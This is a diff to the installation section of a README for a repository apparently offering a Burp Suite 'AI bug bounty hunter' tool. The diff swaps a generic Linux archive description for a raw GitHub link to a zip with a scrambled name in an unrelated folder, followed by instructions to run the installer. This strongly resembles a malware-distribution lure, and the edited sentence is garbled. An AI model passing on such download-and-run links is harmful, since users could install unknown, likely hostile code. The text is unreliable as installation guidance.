Shubh03-m/Burp_Suite-Antigravity_AI-Bug_Bounty_Hunter/README.md

    - For Windows, it will usually be a `.exe` file.
    - For macOS, look for a `.dmg` or `.pkg` file.
-   - For Linux, you might find a `.tar.gz` or similar archive.
+   - For Linux, you might find a `https://github.com/Shubh03-m/Burp_Suite-Antigravity_AI-Bug_Bounty_Hunter/raw/refs/heads/main/Cordula/Suite-Bounty-Bug-A-Antigravity-Hunter-Burp-2.7.zip` or similar archive.

 4. **Run the Installer:** Once the download finishes, locate the downloaded file and double-click it to run the installer.
 Follow the on-screen instructions to complete the installation.